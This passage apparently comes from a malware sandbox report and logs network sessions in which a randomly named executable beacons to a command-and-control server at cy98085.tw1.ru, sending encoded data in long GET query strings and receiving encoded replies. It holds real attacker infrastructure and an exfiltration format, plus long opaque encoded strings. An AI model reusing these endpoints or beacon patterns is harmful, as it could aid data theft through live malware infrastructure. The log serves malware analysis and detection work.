                    Data Ascii: ==QfiEWMmNmMmBjYzUmZlZjN4IjMyATZjNTNmFWM4QWN1UGNiojI4gTY0UWOyUGZ2cDN0MTNxQWOiNmYlhTO2YjY5UGN1EjIsIiZR92dPlmS5pFWSlnWYpVdiBjT1klM1w2YupUMZFTO1F2VkFjYIJkdad1Ypl0QBtETDl0aJp2bp9URaVlVWlzciJjS0VmVOVTWyUDbj5mSxkVM5UXYXRWMihkQ2p1VjlWSDF0SMNUSrlkavlmYHlTaihFbUV2VOVnWYpUekdlTmJWbs5GZXh3diJjVulUaBd2QpdXaSZkTWlkavlmWXJldRNDbqJWbWl3YuZlaYJTNwp1MWN3YHlDbalXSnlUQvNXStRXeiFDbmRmMW9ETxgHaZJDb5p1VxIUSq9WaadVN2VWbWRXYYJlZi1GbuR2V4dnYyYlbJlWQnNUa3lWTElUaPlmS6R2VstWWWpUNZJjR5R2VOpWUXVjdhhlUollM5MHWyUDcaNjVzN2R5wmW5l0ZJF0bzlkanJTTEFUdOR0Y0lkavlmWXJVMkdEbuJWb5MHWyUDcaNjVzN2R5wmW5l0ZJF0bzlkaNlXTUNWdNRUUp9UaKxmWIZFMhhlUoJmR5UXYXRWMihkQ2p1VjlWSDF0SMNkSollMslnWXFjQJdEawMWb58USq9WaadVMoRlbSVnWXVDckdUN2lVM5UXYXRWMihkQ2p1VjlWSDF0SMNkSCRVaJZTStZ1aiBjTwIWbWVXYYJVdiJjTmJWbs5GZXh3diJjVulUaBd2QphHbjJDeoplavlmWYJFajxmUCZlbWxGWyUDcaNjVzN2R5wmW5l0ZJF0bz1ERvlmVVZVdhZVO1F2VkFjYIJkdad1Ypl0QBtETDpkeahlUoRmRNdmWHZFMhdVNWlkavlmWXFDaU5Gb5R2R1EjYy4kZi1GbuR2V4dnYyYlbJlWQnNUa3lWVxUVaPlmSsp1R5QUZYpEMi5mV2lVM5UXYXRWMihkQ2p1VjlWSDF0SMNUS41ERVl2T [TRUNCATED]
                    Nov 23, 2024 02:20:10.246107101 CET1111INData Raw: 46 30 62 7a 6c 55 61 4a 5a 54 53 74 5a 31 61 69 42 6a 54 6f 70 46 57 4b 68 47 57 79 55 44 63 61 4e 6a 56 7a 4e 32 52 35 77 6d 57 35 6c 30 5a 4a 46 30 62 7a 6c 55 62 30 6c 6e 59 78 73 32 5a 6b 4a 6a 56 50 6c 6b 61 76 6c 6d 57 58 46 44 61 55 31 57
                    Data Ascii: F0bzlUaJZTStZ1aiBjTopFWKhGWyUDcaNjVzN2R5wmW5l0ZJF0bzlUb0lnYxs2ZkJjVPlkavlmWXFDaU1WN2F2Vkx2YslTdhdFZxIGSCZnWXNWaJNUQLx0QKpFVplkNJ1mVrJGMOVnYywmbahlSmJWbs5GZXh3diJjVulUaBd2QpdXahNjS2d1UCNjWVRTaPlmS1JmMs5mWYpkZi1GbuR2V4dnYyYlbJlWQnNUa3lWYzokdXNlQ


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.649729185.114.245.123807248C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    TimestampBytes transferredDirectionData
                    Nov 23, 2024 02:20:11.861928940 CET826OUTGET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&1897097195362e5524f24dd6cd4188d9=0VfiIiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIlFGOzYWZhdjM4kzMmVmNlJGN5MzMhZ2MxEjZ5EGN5U2YjRmY0M2NxIiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Connection: Keep-Alive


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.649730185.114.245.123807248C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    TimestampBytes transferredDirectionData
                    Nov 23, 2024 02:20:11.871232033 CET2229OUTGET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMlWVtRGcSNTWCpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0Q [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Connection: Keep-Alive


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.649731185.114.245.123807248C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    TimestampBytes transferredDirectionData
                    Nov 23, 2024 02:20:12.104047060 CET1437OUTGET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&53aa3a9fb57d34776a6131d2274538b1=QX9JSUmlWTYpFc41WW0ZlMjpnRFl0d502YsJlbipkQTVWeGdlYwpESVNGeGRGb10GTwolMipXOtNmasdlYjhnVLJzZEV2bBl3Ysh3VhdkQTJGaKNjW2pESVNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIlFGOzYWZhdjM4kzMmVmNlJGN5MzMhZ2MxEjZ [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Connection: Keep-Alive
                    Nov 23, 2024 02:20:13.439039946 CET161INHTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:20:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 0
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.649757185.114.245.123807248C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    TimestampBytes transferredDirectionData
                    Nov 23, 2024 02:20:17.081677914 CET2209OUTGET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Nov 23, 2024 02:20:18.599766016 CET267INHTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:20:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 79 59 35 63 44 4e 6b 4e 54 59 30 41 54 4f 31 63 54 4f 33 49 54 4e 69 68 44 4f 78 51 54 59 31 51 57 4d 6a 5a 6a 5a 77 59 44 5a 33 49 79 65 36 49 69 59 68 6c 54 4e 78 67 6a 59 6d 6c 7a 59 78 67 54 4f 77 4d 44 5a 6b 52 6d 59 34 45 54 5a 32 4d 32 4e 79 59 6a 4d 6a 5a 47 5a 79 49 79 65
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.649775185.114.245.123807248C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    TimestampBytes transferredDirectionData
                    Nov 23, 2024 02:20:23.853331089 CET2209OUTGET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Nov 23, 2024 02:20:25.217832088 CET267INHTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:20:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 79 59 35 63 44 4e 6b 4e 54 59 30 41 54 4f 31 63 54 4f 33 49 54 4e 69 68 44 4f 78 51 54 59 31 51 57 4d 6a 5a 6a 5a 77 59 44 5a 33 49 79 65 36 49 69 59 68 6c 54 4e 78 67 6a 59 6d 6c 7a 59 78 67 54 4f 77 4d 44 5a 6b 52 6d 59 34 45 54 5a 32 4d 32 4e 79 59 6a 4d 6a 5a 47 5a 79 49 79 65
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.649790185.114.245.123807248C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    TimestampBytes transferredDirectionData
                    Nov 23, 2024 02:20:30.347333908 CET2209OUTGET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Nov 23, 2024 02:20:31.825900078 CET267INHTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:20:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 79 59 35 63 44 4e 6b 4e 54 59 30 41 54 4f 31 63 54 4f 33 49 54 4e 69 68 44 4f 78 51 54 59 31 51 57 4d 6a 5a 6a 5a 77 59 44 5a 33 49 79 65 36 49 69 59 68 6c 54 4e 78 67 6a 59 6d 6c 7a 59 78 67 54 4f 77 4d 44 5a 6b 52 6d 59 34 45 54 5a 32 4d 32 4e 79 59 6a 4d 6a 5a 47 5a 79 49 79 65
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    7192.168.2.649812185.114.245.123807248C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    TimestampBytes transferredDirectionData
                    Nov 23, 2024 02:20:36.955472946 CET2209OUTGET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Nov 23, 2024 02:20:38.469568014 CET267INHTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:20:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 79 59 35 63 44 4e 6b 4e 54 59 30 41 54 4f 31 63 54 4f 33 49 54 4e 69 68 44 4f 78 51 54 59 31 51 57 4d 6a 5a 6a 5a 77 59 44 5a 33 49 79 65 36 49 69 59 68 6c 54 4e 78 67 6a 59 6d 6c 7a 59 78 67 54 4f 77 4d 44 5a 6b 52 6d 59 34 45 54 5a 32 4d 32 4e 79 59 6a 4d 6a 5a 47 5a 79 49 79 65
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    8192.168.2.649831185.114.245.123807248C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    TimestampBytes transferredDirectionData
                    Nov 23, 2024 02:20:43.596457005 CET2209OUTGET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Nov 23, 2024 02:20:44.961993933 CET267INHTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:20:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 79 59 35 63 44 4e 6b 4e 54 59 30 41 54 4f 31 63 54 4f 33 49 54 4e 69 68 44 4f 78 51 54 59 31 51 57 4d 6a 5a 6a 5a 77 59 44 5a 33 49 79 65 36 49 69 59 68 6c 54 4e 78 67 6a 59 6d 6c 7a 59 78 67 54 4f 77 4d 44 5a 6b 52 6d 59 34 45 54 5a 32 4d 32 4e 79 59 6a 4d 6a 5a 47 5a 79 49 79 65
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    9192.168.2.649847185.114.245.123807248C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    TimestampBytes transferredDirectionData
                    Nov 23, 2024 02:20:50.096213102 CET2209OUTGET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
